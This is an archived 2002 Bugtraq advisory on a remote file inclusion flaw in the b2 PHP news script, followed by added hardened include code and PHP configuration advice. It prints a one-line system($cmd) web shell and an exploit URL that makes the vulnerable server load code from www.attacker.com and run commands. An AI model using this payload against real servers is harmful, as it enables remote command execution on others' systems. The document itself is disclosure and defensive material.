Bugtraq mailing list archives

b2 php remote command execution


From: Frank <thran60 () hotmail com>
Date: 6 May 2002 10:13:37 -0000



Site: www.cafelog.com
Vulnerable:

b2 0.6pre2 and earlier.

B2 is a php script which allows webmasters to quickly post 
news on the frontpage and let viewers interact with 
each other. A bug exists in the scripts which allows an 
attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php
 
*snippet*
 
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
 
*snippet*
 
But since b2config.php does not exist inside the directory, 
an attacker can define $b2inc himself.
So if the attacker creates a file on his server, for 
example www.attacker.com , called b2functions.php, and he 
writes the following in it :
 
<? 
system($cmd);
?>
 
(note : the attacker's server must not be able to run php, 
it has to open the file as text)
 
he can include the file like this :
 
http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls
 
This would execute the ls command on vulnerablehost.com.

Fix:
Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same 
fix a few days earlier. 
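
A hardened form of the include shown in the advisory, as an added example that is not part of the original post and is not b2's own code. It assumes b2config.php sits in the install root one level above b2-include/ and sets $b2inc to a directory under that root; resolve_include_dir is a hypothetical helper.

```php
<?php
// Added example (not b2's code). Assumptions: the install root is the parent
// of b2-include/, and b2config.php sets $b2inc to a directory under that root.

/**
 * Return the real path of $dir if it is a local directory at or below $root,
 * or false. Remote wrappers (http://, ftp://, php://, ...) are rejected.
 */
function resolve_include_dir($dir, $root)
{
    if (!is_string($dir) || $dir === '' || strpos($dir, "\0") !== false) {
        return false;
    }
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $dir)) {
        return false;                       // URL-style value, e.g. from ?b2inc=
    }
    $rootReal = realpath($root);
    // Relative names are resolved against the install root, not the CWD.
    $isAbsolute = $dir[0] === '/' || preg_match('#^[A-Za-z]:[\\\\/]#', $dir);
    $real = realpath($isAbsolute ? $dir : $root . '/' . $dir);
    if ($rootReal === false || $real === false || !is_dir($real)) {
        return false;
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return ($real === $rootReal || strpos($real, $prefix) === 0) ? $real : false;
}

// Hardened head of a script in b2-include/:
$root = dirname(__DIR__);
unset($b2inc);                              // drop any request-supplied value
$config = $root . '/b2config.php';
if (!is_file($config)) {                    // include_once would only warn and continue
    http_response_code(500);
    exit('configuration missing');
}
require_once $config;                       // assumed to set $b2inc
$incDir = resolve_include_dir(isset($b2inc) ? $b2inc : null, $root);
if ($incDir === false) {
    http_response_code(500);
    exit('invalid include directory');
}
require_once $incDir . '/b2functions.php';
```

Independently of the script, `allow_url_include = Off` (PHP 5.2 and later) stops include/require from fetching remote URLs, and `register_globals`, which is what lets a query parameter become $b2inc, was removed in PHP 5.4.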

